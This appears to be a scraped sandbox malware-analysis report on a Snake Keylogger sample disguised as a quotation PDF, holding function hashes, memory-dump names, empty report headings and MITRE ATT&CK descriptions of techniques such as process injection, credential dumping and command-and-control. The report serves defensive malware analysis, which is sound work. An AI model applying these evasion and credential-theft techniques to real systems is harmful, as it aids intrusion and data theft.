String ID:
API String ID:
Opcode ID: 4bb77f77871a48d16be0216a685000762a3162c92a83818f087b4c6fe2d797b3
Instruction ID: 9a001a05b00be75e64b2f952c29e051e2678b6999307a6411b67fb5736dab87b
Opcode Fuzzy Hash: 4bb77f77871a48d16be0216a685000762a3162c92a83818f087b4c6fe2d797b3
Instruction Fuzzy Hash: CA41DF31B0860E8BDB58EB58C8A06FDB7A4FF95311F1041BAD60DE7182DA38AA45CB50

Function 00007FFD34850738 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56ea01d22c1ed270bd6491dc1d52a606d6bccba84e881564d8abfda1e4758189
Instruction ID: a89dbda85cdb2f7b2ca5d3e1198ea339be1ac6d69b75b9947c030cfd22f97a31
Opcode Fuzzy Hash: 56ea01d22c1ed270bd6491dc1d52a606d6bccba84e881564d8abfda1e4758189
Instruction Fuzzy Hash: DD319372A09A4B5FE795AB7898A51EC7BE1EF47314F0500F6D548E7293CE2C28869701

Function 00007FFD34850740 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fe34ff6d5d9d1d576c2f279c9e4f8a2849458f3e5d2432407fd111c2efda7b0
Instruction ID: 90aaf863c54cd88b5c4488461c16388a2886461b3dd8a9d93e9c44cc140e2553
Opcode Fuzzy Hash: 1fe34ff6d5d9d1d576c2f279c9e4f8a2849458f3e5d2432407fd111c2efda7b0
Instruction Fuzzy Hash: 9631B272A09A4B5FE795AB7898A51EC7BE1EF47314F0500F6D548E7293CE2C2882D701

Function 00007FFD34855C98 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03e3a828c8e46987eb644ed64854e47adecf1799f4f80f909e3074509ccac260
Instruction ID: 9e315a4c731a302edc32ad192418dd39288470e72344a3f8d378f0c7ad3ff7a9
Opcode Fuzzy Hash: 03e3a828c8e46987eb644ed64854e47adecf1799f4f80f909e3074509ccac260
Instruction Fuzzy Hash: 8D317C3188E7CA4FC7439BB08C646E67FB4EF17210B0A05E7E488CB1A3D66D5959C762

Function 00007FFD34850748 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb311c1f237b13adbae6e5c1dd9cc40014a569404b2d6d85a09c775eb379109b
Instruction ID: 6ace61cd6c55dd59a6b41ba77e0bf2dd76532a98c00d721030e6455c3f69ac97
Opcode Fuzzy Hash: fb311c1f237b13adbae6e5c1dd9cc40014a569404b2d6d85a09c775eb379109b
Instruction Fuzzy Hash: BC31A132A49A8B9FE795AB7898A55EC7BF1EF47314F4500F6D548E7293CE2C2881C701

Function 00007FFD34856749 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40f0117daef7f21b322ffb5efeaff48b2c65a9763e02801d34bf281982fa2a66
Instruction ID: 6706bc4b021e86e29f579bd2f9902054f50b1d9290f6c3db9a022ca3f0328ab8
Opcode Fuzzy Hash: 40f0117daef7f21b322ffb5efeaff48b2c65a9763e02801d34bf281982fa2a66
Instruction Fuzzy Hash: 0131D271E1862D8FDBA8DB58D4A4BEDB7B1FB59311F1041A9D10EE3291DB38A984DF00

Function 00007FFD3485ABA4 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c20d83797b07905cdb45ec55636210c80c0764ab9822ebccb5c16f1a5c35af70
Instruction ID: 4a84b27da7fee1403e0ec496aa71924210e22e2c2e389ecedfe86e50d8db26f0
Opcode Fuzzy Hash: c20d83797b07905cdb45ec55636210c80c0764ab9822ebccb5c16f1a5c35af70
Instruction Fuzzy Hash: 5F213630D1861E8FEB95DF95C890BEDB7B1FF45300F1082A9D109A3285DB786A86DF80

Function 00007FFD34856227 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cedd1797187bb5d576d491a3a249993eb520d970bee47b39012140ada7a86312
Instruction ID: 7f08543e3b9d9850c820ef8515b33dd45f1adf98fe3f19433d646a9ec4ca2676
Opcode Fuzzy Hash: cedd1797187bb5d576d491a3a249993eb520d970bee47b39012140ada7a86312
Instruction Fuzzy Hash: 6711F871E0861D8EEB54EFA8C499AEDBBF1FF54301F10467AE049E7291DB386485DB40

Function 00007FFD3485AB85 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 418a095db2f8e661f19b8e17967ae83bb9d60bae348558266fa84979dc387b68
Instruction ID: 49afca3345b69197915424bf8867d3a0576c37cbdc3cceb6d31dcfdefcb400a7
Opcode Fuzzy Hash: 418a095db2f8e661f19b8e17967ae83bb9d60bae348558266fa84979dc387b68
Instruction Fuzzy Hash: 59015E70E1861E8BEB99DF48C890BEDB7B1FF85304F1002A9D508E3290DB386A46DF40

Function 00007FFD3485AB91 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 742094a97631f4f54356b82a0b6e659c4bba7384ff6ec0dba89f0f6ed5c51033
Instruction ID: b369b84c00ffb6718db84475a6d8738090e5539ae7d99f2d596d7996659d1160
Opcode Fuzzy Hash: 742094a97631f4f54356b82a0b6e659c4bba7384ff6ec0dba89f0f6ed5c51033
Instruction Fuzzy Hash: 2101DA70D1461D8FDBA9DF48C495BEDB7B5FF45304F1041A9D509E3290DB386A459B40

Function 00007FFD3485AB9B Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d1c13443941b8a7879bb4c8c78a74ddb121512364a22fe4d15db8a6aa0da6f3
Instruction ID: 99d477329eee61e74dcfe7177eb2e5cfd386e7f812832039b713a4a51344dbd3
Opcode Fuzzy Hash: 3d1c13443941b8a7879bb4c8c78a74ddb121512364a22fe4d15db8a6aa0da6f3
Instruction Fuzzy Hash: 48F04F30D1860E8FEB99DF44C491BED73B0FF45300F1002A9D519E3290DA386A46DB40

Function 00007FFD3485D4FE Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 013b74331ba42e573628efe77562e40c018317e1e93fceab5ac5d24e0a1112c0
Instruction ID: 7760019048ece617cdbfd1d5650943d1c793d3e66517dce35ff44a0ec64d750c
Opcode Fuzzy Hash: 013b74331ba42e573628efe77562e40c018317e1e93fceab5ac5d24e0a1112c0
Instruction Fuzzy Hash: 5AE0C971D0552A8BEB68DB54C8A5BE8B3B0EF15304F0442FA941EE61D1EE342A89DE50

Function 00007FFD348551FA Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04abb71bb83205ca9c972773484773907a7787623d0778fef7459efb99bfd813
Instruction ID: 62e0f302f398d286efacedb49e871dc63256e26921c77733fd9ac69b9eecff09
Opcode Fuzzy Hash: 04abb71bb83205ca9c972773484773907a7787623d0778fef7459efb99bfd813
Instruction Fuzzy Hash: C8A0025F74852235A12071DEB5124ED970DDAC33FB7144133E35DE40535944505A16A5

Function 00007FFD348530DB Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d06fc82bd91dd87f64410d4a1290a2197c08fe4e94cb62838a334a205274e7f
Instruction ID: 757a3f532547c9725d908f9b6a70408f812b874a4ba037110021341bf7e49e9c
Opcode Fuzzy Hash: 8d06fc82bd91dd87f64410d4a1290a2197c08fe4e94cb62838a334a205274e7f
Instruction Fuzzy Hash:

Non-executed Functions

Function 00007FFD348584EC Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3407648749.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34850000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 559ca4c31145bd6c2b69452d308c1ba751ca7619bfe4cefa0c4f9cc619774586
Instruction ID: d47069ebf618db5e60c13cb2cbad87cd67341911bcabf28aec9341aac7da6476
Opcode Fuzzy Hash: 559ca4c31145bd6c2b69452d308c1ba751ca7619bfe4cefa0c4f9cc619774586
Instruction Fuzzy Hash: B1E1EC70A08A1E8FDB94EF68C494BADB7F1FF59301F5041AAD40DE7291CA34A985CF11

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Function 00007FFD349504CA Relevance: 5.9, Strings: 4, Instructions: 854
COMMON

Function 00007FFD34958F08 Relevance: .7, Instructions: 707
COMMON

Function 00007FFD34954829 Relevance: .6, Instructions: 557
COMMON

Function 00007FFD348B153B Relevance: 2.1, Strings: 1, Instructions: 810
COMMON

Function 00007FFD34964FC5 Relevance: 1.7, APIs: 1, Instructions: 157
COMMON

Function 00007FFD34798BD3 Relevance: 1.4, Strings: 1, Instructions: 117
COMMON

Function 00007FFD34798C25 Relevance: 1.3, Strings: 1, Instructions: 90
COMMON

Function 00007FFD3479BF9D Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Function 00007FFD348B200D Relevance: .6, Instructions: 565
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre